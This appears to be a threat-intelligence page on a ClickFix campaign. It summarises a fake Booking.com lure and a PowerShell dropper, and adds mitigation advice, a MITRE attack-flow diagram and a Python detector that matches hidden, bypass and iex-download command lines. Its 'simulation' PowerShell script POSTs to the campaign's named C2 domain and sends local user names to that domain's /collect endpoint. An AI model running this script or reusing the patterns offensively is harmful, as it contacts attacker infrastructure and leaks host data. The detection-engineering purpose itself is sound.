SOC Prime Bias: Medium

24 Apr 2026 16:26

Analyzing a full ClickFix attack chain (part 1)


Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report outlines a ClickFix campaign in which a malicious website impersonating Booking.com persuades users to copy and run a PowerShell command. Once executed, the command launches a fileless PowerShell script that downloads a second-stage ZIP archive. The dropper collects host information, writes the payload into the temporary directory, and creates persistence through both a Run registry key and a scheduled task. The full infection chain relies on convincing web content and user-driven execution rather than an obvious exploit.

Investigation

Stormshield analysts captured the JavaScript responsible for retrieving a PowerShell command from a command-and-control domain and placing it into the user’s clipboard. They also analyzed the PowerShell dropper, which collected detailed system information through WMI queries and environment variables before exfiltrating the data through a GET request. The same dropper then downloaded a ZIP archive from a second domain, extracted its contents, and configured persistence on the compromised host. Researchers mapped the observed behaviors and techniques to their corresponding MITRE ATT&CK identifiers.

Mitigation

Organizations should block the malicious domains and URLs tied to the ClickFix campaign and apply strict web filtering to reduce exposure to phishing-style landing pages. Defenders should monitor for PowerShell execution with flags such as -ExecutionPolicy Bypass and hidden window settings, while also limiting the execution of unsigned PowerShell scripts through application control. Additional detections should focus on the creation of suspicious Run registry keys and scheduled tasks with unfamiliar names.

Response

Security teams should alert on outbound traffic to the identified command-and-control domains and on PowerShell command lines that use Invoke-Expression to execute remotely retrieved content. Detection logic should also cover the creation of the specific Run registry value and scheduled task name associated with the campaign. If the activity is confirmed, isolate the endpoint immediately, collect volatile evidence, and perform forensic review of temporary files and the downloaded ZIP payload.
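The behaviours called out in the Mitigation and Response sections, turned into toy detection logic and run over constructed sample events. This is an added example, not SOC Prime's or Stormshield's code; the event field names, the example.invalid host and the PLACEHOLDER_* names are assumptions, since the page does not give the campaign's Run value or task name.

```python
import re
from typing import Dict, List
# Constructed sample events (not real telemetry); "type" selects which check applies.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "cmdline": 'powershell -NoP -W Hidden -ep bypass -c "iex (iwr https://example.invalid/x?get_command=1).Content"'},
    {"type": "process", "cmdline": "powershell -Command Get-Service Spooler"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "PLACEHOLDER_RUN_VALUE", "data": r"C:\Users\u\AppData\Local\Temp\stage2\run.bat"},
    {"type": "task", "name": "PLACEHOLDER_TASK", "trigger": "logon",
     "action": r"C:\Users\u\AppData\Local\Temp\stage2\run.bat"},
    {"type": "proxy", "method": "POST", "uri": "https://example.invalid/x?get_command=1"},
    {"type": "proxy", "method": "GET", "uri": "https://example.invalid/index.html"},
]

TEMP_PATH = re.compile(r"\\Temp\\|%TEMP%", re.I)  # the dropper writes its payload under the temp directory
PS_FLAGS = [
    (re.compile(r"-(?:ExecutionPolicy|ep)\s+bypass", re.I), "executionpolicy_bypass"),
    (re.compile(r"-(?:WindowStyle|w)\s+hidden", re.I), "hidden_window"),
]
IEX = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)
REMOTE_FETCH = re.compile(r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b", re.I)

def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of the detections that fire on one event (empty = nothing suspicious)."""
    hits: List[str] = []
    kind = event["type"]
    if kind == "process":
        cmd = event["cmdline"]
        hits += [name for rx, name in PS_FLAGS if rx.search(cmd)]
        if IEX.search(cmd) and REMOTE_FETCH.search(cmd):  # iex of remote content, either operand order
            hits.append("iex_remote_content")
    elif kind == "registry":
        if event["key"].lower().endswith(r"\currentversion\run") and TEMP_PATH.search(event["data"]):
            hits.append("run_key_temp_payload")
    elif kind == "task":
        if event["trigger"] == "logon" and TEMP_PATH.search(event["action"]):
            hits.append("logon_task_temp_payload")
    elif kind == "proxy":
        # Mirrors the Sigma conditions quoted in the simulation section: POST with ?get_command=1
        if event["method"] == "POST" and "?get_command=1" in event["uri"]:
            hits.append("clickfix_get_command_post")
    return hits

def run(events: List[Dict[str, str]] = SAMPLE_EVENTS) -> Dict[int, List[str]]:
    """Map event index to its fired detections, omitting events that fired nothing."""
    return {i: h for i, e in enumerate(events) if (h := detect(e))}

if __name__ == "__main__":
    for i, names in run().items():
        print(f"event {i}: {', '.join(names)}")
```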

Attack Flow

    graph TB
        %% Class Definitions
        classDef action fill:#99ccff
        classDef technique fill:#ffeb99
        classDef tool fill:#ccffcc
        classDef process fill:#ffcccc
        classDef persistence fill:#ddddff

        %% Nodes
        action_initial["<b>Action</b> – Initial Access: Malicious copy-paste webpage"]
        tech_user_exec["<b>Technique</b> – T1204.004 User Execution: Malicious Copy and Paste"]
        process_ps["<b>Process</b> – PowerShell command copied to clipboard"]
        tech_ps["<b>Technique</b> – T1059.001 PowerShell"]
        tech_process_inject["<b>Technique</b> – T1055.011 Process Injection"]
        action_discovery["<b>Action</b> – System Discovery"]
        tech_account_discovery["<b>Technique</b> – T1087 Account Discovery"]
        tech_security_sw["<b>Technique</b> – T1518.001 Security Software Discovery"]
        tech_time_discovery["<b>Technique</b> – T1124 System Time Discovery"]
        action_c2["<b>Action</b> – Command and Control"]
        tech_http_c2["<b>Technique</b> – T1071.001 Web Protocols (HTTP)"]
        action_download["<b>Action</b> – Payload Download"]
        tech_ingress["<b>Technique</b> – T1105 Ingress Tool Transfer"]
        action_deploy["<b>Action</b> – Deploy payload (ZIP extraction)"]
        action_persistence["<b>Action</b> – Persistence establishment"]
        tech_registry_run["<b>Technique</b> – T1547.001 Registry Run Keys / Startup Folder"]
        tech_scheduled_task["<b>Technique</b> – T1053.005 Scheduled Task/Job: At Logon"]
        action_final["<b>Action</b> – Final execution of payload"]
        process_payload["<b>Process</b> – Extracted executable or batch file"]

        %% Connections
        action_initial -->|triggers| tech_user_exec
        tech_user_exec -->|leads to| process_ps
        process_ps -->|executes| tech_ps
        tech_ps -->|may perform| tech_process_inject
        tech_process_inject -->|enables| action_discovery
        action_discovery -->|uses| tech_account_discovery
        action_discovery -->|uses| tech_security_sw
        action_discovery -->|uses| tech_time_discovery
        action_discovery -->|sends data to| action_c2
        action_c2 -->|uses| tech_http_c2
        action_c2 -->|triggers| action_download
        action_download -->|uses| tech_ingress
        action_download -->|stores file in| action_deploy
        action_deploy -->|creates| action_persistence
        action_persistence -->|uses| tech_registry_run
        action_persistence -->|fallback| tech_scheduled_task
        action_persistence -->|enables| action_final
        action_final -->|launches| process_payload

        %% Class Assignments
        class action_initial action
        class tech_user_exec technique
        class process_ps process
        class tech_ps technique
        class tech_process_inject technique
        class action_discovery action
        class tech_account_discovery technique
        class tech_security_sw technique
        class tech_time_discovery technique
        class action_c2 action
        class tech_http_c2 technique
        class action_download action
        class tech_ingress technique
        class action_deploy action
        class action_persistence action
        class tech_registry_run technique
        class tech_scheduled_task technique
        class action_final action
        class process_payload process

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An attacker, having obtained a foothold on a compromised internal workstation, issues a PowerShell one‑liner that contacts the ClickFix C2 URL with the ?get_command=1 parameter via an HTTP POST. The server returns a PowerShell payload that enumerates local user accounts (T1087), checks system time (T1124), discovers installed security products (T1518.001), and then copies the output to the clipboard. The clipboard content is subsequently posted back to the ClickFix server for exfiltration, fulfilling T1204.004 and T1547.001. This exact traffic pattern matches the Sigma rule’s request_uri|contains: "?get_command=1" and http_method: POST conditions.

  • Regression Test Script:

    # ClickFix Command Fetch Simulation – triggers the Sigma rule
    # The request URI and method mirror the rule conditions: request_uri contains "?get_command=1", http_method POST
    $url = "https://accountpulsecentre.help/ern-ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s?get_command=1"
    $payload = @{
        dummy = "data"
    }

    # Send the malicious POST request (-UseBasicParsing avoids the Internet Explorer dependency on Windows PowerShell 5.1)
    try {
        $response = Invoke-WebRequest -Uri $url -Method POST -Body ($payload | ConvertTo-Json) -ContentType "application/json" -UseBasicParsing
        $psCommand = $response.Content
    } catch {
        # The C2 may be blocked or sinkholed; the network telemetry is generated by the attempt itself
        Write-Warning "Command fetch failed: $($_.Exception.Message)"
        $psCommand = ""
    }

    # The fetched PowerShell command is only logged here, never executed
    Write-Output "Fetched command: $psCommand"

    # For demonstration, run a harmless subset (e.g., get local users) and copy to clipboard
    $users = Get-LocalUser | Select-Object -ExpandProperty Name
    $usersString = $users -join "`n"
    Set-Clipboard -Value $usersString

    # Exfiltrate clipboard content back to ClickFix server (simulated); a hashtable body is sent form-urlencoded
    $exfilUrl = "https://accountpulsecentre.help/collect"
    try {
        Invoke-WebRequest -Uri $exfilUrl -Method POST -Body @{clipboard=$usersString} -ContentType "application/x-www-form-urlencoded" -UseBasicParsing | Out-Null
    } catch {
        Write-Warning "Exfiltration POST failed: $($_.Exception.Message)"
    }

  • Cleanup Commands:

    # Remove any temporary files or artifacts created during the test
    # PowerShell ships no Clear-Clipboard cmdlet; clear the clipboard through .NET instead
    Add-Type -AssemblyName System.Windows.Forms
    [System.Windows.Forms.Clipboard]::Clear()
    Write-Output "Cleanup complete – clipboard cleared."